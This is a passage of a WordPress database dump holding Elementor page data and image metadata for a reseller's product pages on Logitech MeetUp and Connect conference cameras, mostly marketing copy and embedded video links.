Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"cfcc955\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5494,2937,'_elementor_version','0.4'),(5508,2939,'_elementor_template_type','post'),(5509,2939,'_wp_page_template','elementor_header_footer'),(5510,2939,'_elementor_data','[{\"id\":\"00be070\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"84682c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0a77ac1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>MEETUP<\\/h2><p>All-in-One ConferenceCam with an extra-wide field of view and integrated audio, perfect for small conference and huddle rooms<\\/p><ul><li>See everyone, even those close to the camera<\\/li><li>RightSense\\u2122 Technologies with automatic framing<\\/li><li>Compact design minimizes cabling and clutter<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"03b6797\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"963c473\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f3383c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39a9a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fd44a2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>PERFECT FOR SMALL ROOMS<\\/h2><p>MeetUp is Logitech\\u2019s premier ConferenceCam designed for small conference rooms and huddle rooms. Stop crowding around laptops. With an extra wide field of view, motorized lens and rightsight\\u2122 auto framing plus a pan\\/tilt lens, MeetUp makes every seat at the table clearly visible. With integrated audio optimized for huddle room acoustics, everyone can be heard as well as seen.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a1e6e4a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"93a8ede\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f333ba6\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/tD_tmRMN2OA\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"65c40a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a6e2b9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>A WIDE VIEW FOR TIGHT SPACES<\\/h3><p>Logitech\\u00ae MeetUp brings remarkable video quality to small conference rooms. Its extra wide field-of-view easily accommodates huddle rooms where people sit on either side of the camera. The 4K ultra high-def sensor and Logitech lens deliver extra sharp clarity, while pan, tilt, and zoom controls let you focus on presenters and their visual aids.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a3562e7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4fd72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2c46c3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>HEARING IS BELIEVING<\\/h3><p>Housed within a patent-pending anti-vibration enclosure, three beamforming mics MeetUp\\u2019s integrated audio is optimized for huddle room acoustics, delivering exceptional sound in small rooms. Three beamforming mics and a custom-tuned speaker ensure meetings sound as great as they look. Add Expansion Mic for MeetUp to extend the audio range up to 4.2 meters.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"679bfe0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6a0541c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam.jpg\",\"id\":2930}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d325f5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ce92ebf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1e20686\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/CqeUIzYth_w\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"f858b37\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fcf3b26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>AS EASY AS PLUG AND PLAY<\\/h3><p>Step into a huddle room and instantly start a video collaboration. Whether it is Video conferencing, recording, or broadcasting applications that support USB cameras MeetUp simply works.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5350d12\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"939cb8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6523bac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DESIGNED FOR THE WAY PEOPLE MEET<\\/h3><p>Small conference rooms are growing in popularity, and MeetUp rises to the challenge. It provides superb resolution, color balance, detail, and audio in tight spaces. With the included wall mount and compact design that minimizes cable clutter, MeetUp optimizes the huddle room experience.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"544ff47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6da856b\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/4xwIpyv3KOs\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19d44ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e256d3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"51124da\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":2932,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam-3.jpg\"},{\"id\":2933,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam-2.jpg\"},{\"id\":2934,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam-1.jpg\"}],\"thumbnail_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"9e2b2c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9f49a3c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EXTRAS PROVIDE MORE CONVENIENCE<\\/h3><p>Our free mobile app (available on Google Play and iTunes) turns your smartphone or tablet into a remote control for MeetUp. Add accessories such as the Logitech Expansion Mic and TV Mount for different room sizes and configurations. Order replacement parts if needed to keep everything up and running.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7bfe2ba\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3d69037\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"937331b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>5X ZOOM<\\/h4><p>Perfectly frame presenters to minimize background distractions. Zoom in on whiteboards and objects so remote participants can see what you see. Thanks to its advanced 4K image sensor, video remains sharp and clear, even when you zoom in on the details.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eed4149\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7519127\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PREMIUM CAMERA OPTICS<\\/h4><p>MeetUp features exquisitely engineered, premium camera optics that capture a wide field-of-view without distorting faces and furniture with a \\u201cfisheye\\u201d effect. Faces look natural, whiteboard writing remains legible, and straight lines stay straight.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d707460\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5f5fe8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EXPANSION MIC-READY<\\/h4><p>Logitech Expansion Mic for MeetUp provides greater flexibility in huddle room configurations. MeetUp\\u2019s built-in beamforming mics are optimized for up to 8 feet (2.4 meters). To extend that range up to 14 feet (4.2 meters), add an Expansion Mic. So whether people are seated at a table, sitting against the wall, or walking around the room, Expansion Mic for MeetUp means everyone will be heard.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ea6e88\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a43dc18\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CERTIFIED FOR BUSINESS<\\/h4><p>MeetUp offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business and ready for Teams, Microsoft Cortana\\u00ae, Cisco Jabber\\u2122 compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo,Fuze and Zoom. If your preferred application can recognize a webcam, you can use it with MeetUp.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0264c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"05c50ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0569406\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>BLUETOOTH\\u00ae SPEAKERPHONE<\\/h4><p>Already connected on your smartphone? Dialing into an audio conference? Pair MeetUp with your smartphone or tablet to enjoy outstanding audio clarity, volume, and range that handheld devices can\\u2019t match.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"83af3f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8d354cd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>TAKE CONTROL<\\/h4><p>MeetUp gives you two ways to aim the camera, zoom in and out, set and recall presets, and manage volume and mute. The included remote control uses radio frequency (RF) signals for reliable and discrete control from anywhere in the room. Or, download the free Logi Remote app (available on Google Play and iTunes to control MeetUp with a smartphone or tablet.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dec4b8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8f69f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>VERSATILE TV MOUNT<\\/h4><p>Logitech TV Mount for MeetUp lets you mount the MeetUp ConferenceCam either above or below a flat-panel monitor, and attaches to the industry-standard VESA mounting points available on most TVs and monitors.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9173c99\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4e17717\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>RIGHTSENSE<\\/h4><p>Logitech RightSense\\u2122 proactive technologies make better video meetings easy and automatic.H\\u00ae RightSound optimizes the human voice and enhances conversational clarity, RightSight automatically moves the camera and adjusts the zoom so no one gets left out of the picture, and RightLight helps everyone look their best on camera, regardless of lighting conditions. With RightSense on board, video meetings are naturally more beautiful and efficient with no calibration, manual intervention or support required.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5507,2939,'_elementor_edit_mode','builder'),(5513,2940,'_edit_lock','1551669857:1'),(5514,2940,'_edit_last','1'),(5503,2928,'_oembed_e28ff20f26aaf3d6866a6a6504a59c7d','<iframe width=\"800\" height=\"450\" src=\"https://www.youtube.com/embed/CqeUIzYth_w?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(5504,2928,'_oembed_time_e28ff20f26aaf3d6866a6a6504a59c7d','1551666235'),(5505,2928,'_oembed_645effc6e196e60396d0c0c284a486df','<iframe width=\"800\" height=\"450\" src=\"https://www.youtube.com/embed/4xwIpyv3KOs?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(5506,2928,'_oembed_time_645effc6e196e60396d0c0c284a486df','1551666235'),(5511,2939,'_elementor_version','0.4'),(5515,2940,'_elementor_edit_mode','builder'),(5516,2940,'_elementor_template_type','post'),(5517,2940,'_wp_page_template','template-fullwidth.php'),(5518,2940,'_hide_page_title',''),(5519,2940,'_hide_header',''),(5520,2940,'_hide_footer',''),(5521,2940,'_hide_breadcrumb',''),(5522,2940,'_cover',''),(5523,2940,'_show_excerpt',''),(5524,2940,'_wc_apply_product',''),(5525,2940,'_yoast_wpseo_content_score','60'),(5526,2941,'_elementor_edit_mode','builder'),(5527,2941,'_elementor_template_type','post'),(5528,2941,'_wp_page_template','elementor_header_footer'),(5529,2942,'_wp_attached_file','2019/03/conferencecam-connect-1.png'),(5530,2942,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:687;s:6:\"height\";i:600;s:4:\"file\";s:35:\"2019/03/conferencecam-connect-1.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"conferencecam-connect-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"conferencecam-connect-1-300x262.png\";s:5:\"width\";i:300;s:6:\"height\";i:262;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:35:\"conferencecam-connect-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:35:\"conferencecam-connect-1-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:35:\"conferencecam-connect-1-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:33:\"conferencecam-connect-1-20x17.png\";s:5:\"width\";i:20;s:6:\"height\";i:17;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5531,2942,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:238055;s:10:\"size_after\";i:238055;s:4:\"time\";d:0.41000000000000003108624468950438313186168670654296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:11189;s:10:\"size_after\";i:11189;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:35101;s:10:\"size_after\";i:35101;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:19026;s:10:\"size_after\";i:19026;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:63580;s:10:\"size_after\";i:63580;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:109159;s:10:\"size_after\";i:109159;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}}}'),(5532,2943,'_wp_attached_file','2019/03/conferencecam-connect.jpg'),(5533,2943,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:33:\"2019/03/conferencecam-connect.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"conferencecam-connect-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"conferencecam-connect-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"conferencecam-connect-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:33:\"conferencecam-connect-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:33:\"conferencecam-connect-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:33:\"conferencecam-connect-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:31:\"conferencecam-connect-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5534,2943,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.511768172207009541807565256021916866302490234375;s:5:\"bytes\";i:6508;s:11:\"size_before\";i:144245;s:10:\"size_after\";i:137737;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.1699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:412;s:11:\"size_before\";i:6678;s:10:\"size_after\";i:6266;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.36000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:650;s:11:\"size_before\";i:12132;s:10:\"size_after\";i:11482;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.87999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:1828;s:11:\"size_before\";i:47162;s:10:\"size_after\";i:45334;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:592;s:11:\"size_before\";i:10900;s:10:\"size_after\";i:10308;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.9000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1322;s:11:\"size_before\";i:26993;s:10:\"size_after\";i:25671;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.21999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:1704;s:11:\"size_before\";i:40380;s:10:\"size_after\";i:38676;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5543,2945,'_wp_attached_file','2019/03/conferencecam-connect-1.jpg'),(5544,2945,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:35:\"2019/03/conferencecam-connect-1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"conferencecam-connect-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"conferencecam-connect-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"conferencecam-connect-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:35:\"conferencecam-connect-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:35:\"conferencecam-connect-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:35:\"conferencecam-connect-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:33:\"conferencecam-connect-1-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5536,2940,'_elementor_data','[{\"id\":\"f6621d9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2da5e02\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"87f6a4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONNECT<\\/h2><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p><ul><li>Superior video and audio with a compact, 76 mm footprint<\\/li><li>Works with your meeting and video conferencing applications<\\/li><li>Plug-free mobility with rechargeable battery<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"10baf7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9c4b53d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-connect-1.png\",\"id\":2942},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f84517f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"437c30b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e53080b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>FLEXIBLE VIDEO FOR THE ANYWHERE WORKPLACE<\\/h2><p>Simplify video conferencing so anyone can set it up and run a meeting anywhere. Make it affordable so you can outfit every conference room with video. Designed for huddle rooms and home offices, Logitech Connect is also compact and mobile so you can take it throughout the workplace and around the world. Connect is always ready for your next video conference call.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b8b9cc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8894872\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"861f800\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ad441\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c0fd569\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"43abcba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-connect.jpg\",\"id\":2943}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ebc7db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c3d7d21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR SMALL SPACES<\\/h3><p>Logitech Connect goes beyond its award winning design \\u2014 video conferencing so simple to use that anyone can set it up and so affordable you can enable every meeting room with video. Designed for tabletop placement and small spaces, this video conference solution offers a generous 90\\u00b0 field-of-view with pan and tilt, 4x zoom, and razor-sharp optics making it easy to see everyone in the room.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce664\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"31d6359\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f8283bd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>COMPACT ALL-IN-ONE DESIGN<\\/h3><p>Take video conferencing on the go. Carry Connect from meeting to meeting, or pack it when traveling so you never miss the opportunity to meet face to face. With a tabletop footprint just 3 inches (75 mm) across, Connect fits just about anywhere. Even the handheld remote is designed for easy portability, docking as a lens cover so you won\\u2019t lose it in your 